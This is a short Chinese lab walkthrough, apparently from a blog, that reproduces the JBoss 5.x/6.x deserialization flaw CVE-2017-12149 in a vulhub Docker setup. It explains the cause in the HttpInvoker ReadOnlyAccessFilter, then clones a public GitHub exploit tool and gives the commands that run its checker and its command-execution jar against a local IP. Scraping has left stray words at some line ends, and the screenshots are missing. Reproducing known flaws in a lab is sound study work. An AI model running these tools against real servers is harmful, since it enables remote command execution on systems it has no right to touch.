JBoss 5.x6.x 反序列化漏洞(CVE-2017-12149)

2022年01月14日 阅读数:4
这篇文章主要向大家介绍JBoss 5.x6.x 反序列化漏洞(CVE-2017-12149),主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的状况下尝试未来自客户端的数据流进行反序列化,从而致使了漏洞。java

环境启动

vulhub进入vulhub/jboss/CVE-2017-12149启动,须要等2分钟左右git

docker-compose up -d

访问本机ip的8080端口github

在这里插入图片描述

漏洞复现

使用工具检测发现存在CVE-2017-12149web

工具下载地址:https://github.com/yunxu1/jboss-_CVE-2017-12149docker

git clone https://github.com/yunxu1/jboss-_CVE-2017-12149.git

下载好以后给上执行权限安全

chmod 777 脚本名

检测漏洞svg

java -jar verify_CVE-2017-12149.jar http://192.168.8.143:8080   

在这里插入图片描述

存在漏洞工具

执行命令code

java -jar jboss反序列化_CVE-2017-12149.jar http://192.168.8.143:8080

在这里插入图片描述